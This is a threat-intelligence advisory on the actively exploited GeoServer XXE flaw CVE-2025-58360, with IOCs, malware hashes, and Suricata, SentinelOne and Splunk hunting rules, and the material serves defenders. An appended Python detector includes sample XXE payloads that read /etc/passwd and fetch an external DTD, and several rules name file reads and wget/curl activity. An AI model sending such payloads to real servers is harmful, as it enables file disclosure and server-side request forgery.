GeoServer XXE Vulnerability CVE-2025-58360
Potential Affected Sectors
· Government (geospatial departments)
· Environmental services
· Research organizations
· Any entity using the affected GeoServer software versions
Potential Affected Countries
· Global
BLUF
Threat actors are actively exploiting a critical XML External Entity (XXE) vulnerability in unpatched OSGeo GeoServer instances (versions older than 2.28.1), potentially leading to arbitrary file access, Server-Side Request Forgery (SSRF), and denial-of-service conditions. Over 250 active attack attempts were recorded in one 24-hour period, with warnings of mass exploitation within 48 hours.
Date of first reported activity
· November 25, 2025
Date of last reported activity update
· December 11, 2025
CVEs and CVSS Vectors
CVE-2025-58360
CVSS 3.1 Vector
· (9.8) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nessus ID
· This CVE is not currently on the Tenable plugin ID list
Is this on the KEV list?
· Yes, added December 11, 2025
What is the patch by date on the KEV list?
· December 12, 2025
Patching/Mitigation Data
Patch Release Date
· November 25, 2025
Patch URL Link
hxxps://geoserver.org/download/
APT names
· Activity is currently attributed to general "Asia-affiliated threat clusters" and potentially to Mirai/Gafgyt botnet operators
· No specific APT group named at this time.
Associated criminal organization names
· None named in public reporting
IOCs
· IP addresses associated with Asia-affiliated threat clusters (specific IPs are dynamic; initial activity was often observed from the 154.61.77[.]* range).
· Scanning for /geoserver/wms endpoint with XML inputs.
· Commands executed post-exploitation (e.g., whoami, wget for malware samples)
Network and Traffic Indicators
· Unusual Inbound Traffic: Look for spikes in traffic or a high number of requests to the /geoserver/wms endpoint.
· Malformed XML Payloads: Inspect network traffic for crafted XML input that contains external entity references, specifically within the WMS GetMap operation requests. These often use DTD (Document Type Definition) declarations like <!DOCTYPE... > and <!ENTITY... > to call external URLs or local files.
· Anomalous Outbound Traffic: The exploitation often leads to the server making unexpected outbound connections (Server-Side Request Forgery or SSRF) to internal network resources or external, potentially malicious, IP addresses or URLs.
· Geographical Irregularities: Monitor for connections originating from or connecting to countries with which your organization does not typically do business.
Host-Based Indicators
· Unexpected File Access: Check server logs for evidence of the GeoServer process (or the user it runs under) accessing unusual files outside of its normal operating directories, such as /etc/passwd or configuration files (common targets for XXE file disclosure).
· Anomalous Process Activity: Look for the spawning of unusual child processes by the main GeoServer process, which might indicate an attacker attempting further exploitation or establishing persistence.
· Configuration Changes: Suspicious changes to system files or configurations that were not part of a planned administrative action
Tools used in campaign
· Custom XML payloads
· Legitimate tools such as Nuclei templates for scanning/PoC; Mirai/Gafgyt botnet variants
· RondoDox malware
TTPs
· TA0001 Initial Access
· T1190 Exploit Public-Facing Application
· TA0002 Execution
· T1059 Command and Scripting Interpreter
· T1003 OS Credential Dumping
· TA0004 Privilege Escalation
· TA0011 Exfiltration
Malware names
· Mirai variants
· Gafgyt variants
· RondoDox
Malware Sample
Gafgyt
SHA-256
ebee38f02beecf097992c4ea94e6b3dcf860349c4ba6b336bdc9c34f9dce7fd9
URL link to sample
hxxps://www.virustotal.com/gui/file/ebee38f02beecf097992c4ea94e6b3dcf860349c4ba6b336bdc9c34f9dce7fd9
RondoDox
SHA-256
4b8887434743d43ace1779e3381775faa8e3a89241422fe26fc5c4105ada7b17
URL link to sample
hxxps://www.virustotal.com/gui/file/4b8887434743d43ace1779e3381775faa8e3a89241422fe26fc5c4105ada7b17
Suggested rules / potential hunts
These are indicator rules; they are likely to be noisy.
Potential Suricata rules
Generic XXE DTD Detection
This rule looks for <!DOCTYPE together with SYSTEM in the body of a POST to /geoserver/wms. A DTD declaration that carries an external identifier (SYSTEM or PUBLIC) is highly indicative of an XXE attempt; the rule below matches the SYSTEM form, and a copy with content:"PUBLIC" in place of content:"SYSTEM" covers the other. The sid is a placeholder in the local range.
alert http any any -> any any (msg:"ET WEB_SERVER GeoServer CVE-2025-58360 XXE attempt in WMS request"; flow:established,to_server; content:"POST"; http_method; content:"/geoserver/wms"; http_uri; nocase; content:"<!DOCTYPE"; http_client_body; nocase; fast_pattern; content:"SYSTEM"; http_client_body; nocase; classtype:attempted-recon; sid:1234567; rev:1;)
SentinelOne
· Hunt for Suspicious Outbound Connections (SSRF indicator):
This looks for the GeoServer process making unusual network connections to private IP spaces (SSRF) or unexpected external domains that might be used for data exfiltration.
S1QL
(Name = "java" Or Name = "java.exe" Or Name = "geoserver.sh") And Type = "Process" And HasAnyNetwork = True And RemoteIP In ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
Monitor for child processes spawned by the GeoServer application process that execute unusual shell commands (whoami, wget, curl, chmod) or attempt to make outbound connections to known malicious IPs or download paths.
· Hunt for File Access by the Process:
This query hunts for the GeoServer process accessing sensitive system files often targeted by XXE attacks (e.g., /etc/passwd on Linux).
S1QL
(Name = "java" Or Name = "java.exe" Or Name = "geoserver.sh") And Type = "File" And (FilePath Contains "/etc/passwd" Or FilePath Contains "web.xml")
Splunk
· Splunk Web Access Log Query (XXE DTD detection):
This search looks for the sequence <!DOCTYPE and SYSTEM, or an <!ENTITY declaration, within the HTTP request body (POST_Data field) of requests to /geoserver/wms.
index=weblogs uri="/geoserver/wms" ((POST_Data="*<!DOCTYPE*" AND POST_Data="*SYSTEM*") OR POST_Data="*<!ENTITY*") | table _time, src_ip, dest_ip, uri, POST_Data
· Splunk Hunt for Subsequent SSRF/Outbound Activity:
First find the exploit attempts and their timestamps:
index=weblogs uri="/geoserver/wms" POST_Data="*<!DOCTYPE*"
| transaction src_ip maxspan=30s
| table _time, src_ip, uri
Then correlate with network traffic logs. The SSRF signal is outbound traffic from the GeoServer host (src_ip="<GeoServer_IP>"), not the inbound exploit traffic to it; the subsearch returns earliest/latest to time-bound the outer search to the exploit window plus five minutes:
index=network_logs src_ip="<GeoServer_IP>" action=connected
    [ search index=weblogs uri="/geoserver/wms" POST_Data="*<!DOCTYPE*"
      | stats min(_time) AS earliest max(_time) AS latest
      | eval latest=latest+300 ]
| table _time, src_ip, dest_ip, requested_url, bytes_out
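Added example, not part of this advisory or of the GeoServer project: a small Python detector that applies the body inspection described under Malformed XML Payloads and in the Suricata/Splunk rules above, generalised to PUBLIC identifiers and parameter entities. The record fields src_ip, uri and body and the sample records are constructed assumptions.

```python
import re

# A DOCTYPE or ENTITY declaration carrying an external identifier: SYSTEM "uri" or
# PUBLIC "fpi" "uri". Case-insensitive and tolerant of newlines inside the declaration.
EXTERNAL_DECL = re.compile(
    r"<!(DOCTYPE|ENTITY)\s+%?\s*[\w:.-]+[^>]*?\b(SYSTEM|PUBLIC)\b\s*(\"[^\"]*\"|'[^']*')",
    re.IGNORECASE,
)
# Parameter entities (<!ENTITY % name ...>) are the usual vehicle for blind/out-of-band XXE.
PARAM_ENTITY = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)


def inspect_body(uri: str, body: str) -> list[str]:
    """Return the XXE indicators found in one request body (empty list when clean)."""
    # Only the WMS endpoint named in the advisory is inspected; other paths are ignored.
    if not uri.lower().startswith("/geoserver/wms"):
        return []
    reasons = []
    for m in EXTERNAL_DECL.finditer(body):
        decl, ident, target = m.group(1).upper(), m.group(2).upper(), m.group(3)
        reasons.append(f"{decl} with {ident} identifier -> {target}")
    if PARAM_ENTITY.search(body):
        reasons.append("parameter entity declaration")
    return reasons


def scan_requests(records: list[dict]) -> list[dict]:
    """Run inspect_body over parsed access-log records (src_ip, uri, body); one alert per hit."""
    alerts = []
    for rec in records:
        reasons = inspect_body(rec["uri"], rec.get("body", ""))
        if reasons:
            alerts.append({"src_ip": rec["src_ip"], "uri": rec["uri"], "reasons": reasons})
    return alerts


# Constructed sample records (not real traffic): a benign GetMap with an inline SLD body,
# an inline external entity, a parameter entity pulling an external DTD, and a non-WMS hit.
SAMPLE_RECORDS = [
    {"src_ip": "203.0.113.10", "uri": "/geoserver/wms?SERVICE=WMS&REQUEST=GetMap",
     "body": '<?xml version="1.0"?><StyledLayerDescriptor version="1.0.0">'
             '<NamedLayer><Name>topp:states</Name></NamedLayer></StyledLayerDescriptor>'},
    {"src_ip": "203.0.113.11", "uri": "/geoserver/wms",
     "body": '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY ext SYSTEM "file:///etc/passwd">]>'
             '<GetMap><Layer>&ext;</Layer></GetMap>'},
    {"src_ip": "203.0.113.12", "uri": "/GeoServer/WMS",
     "body": '<!DOCTYPE x [\n<!ENTITY % dtd PUBLIC "-//x//EN" "http://dtd.example/e.dtd">\n%dtd;]>'},
    {"src_ip": "203.0.113.13", "uri": "/geoserver/web/", "body": "<!DOCTYPE html>"},
]
```

Expect the Suricata rule above to miss the third record (PUBLIC identifier, no SYSTEM keyword); this detector flags it on both the external identifier and the parameter entity.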
Delivery method
· Remote exploitation via a network request to the public-facing GeoServer application endpoint.
Email samples
Not applicable; these are network-based attacks.
References
GeoServer Org
· hxxps://geoserver.org/download/
NVD
· hxxps://nvd.nist.gov/vuln/detail/CVE-2025-58360
CISA KEV Catalog
· hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2025-58360&field_date_added_wrapper=all&field_cve=&sort_by=field_date_added&items_per_page=20&url=
GitHub
· hxxps://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
Wiz Vulnerability Database
· hxxps://www.wiz.io/vulnerability-database/cve/cve-2025-58360
OpenCVE
· hxxps://app.opencve.io/cve/CVE-2025-58360
VirusTotal
· hxxps://www.virustotal.com/gui/file/4b8887434743d43ace1779e3381775faa8e3a89241422fe26fc5c4105ada7b17
· hxxps://www.virustotal.com/gui/file/ebee38f02beecf097992c4ea94e6b3dcf860349c4ba6b336bdc9c34f9dce7fd9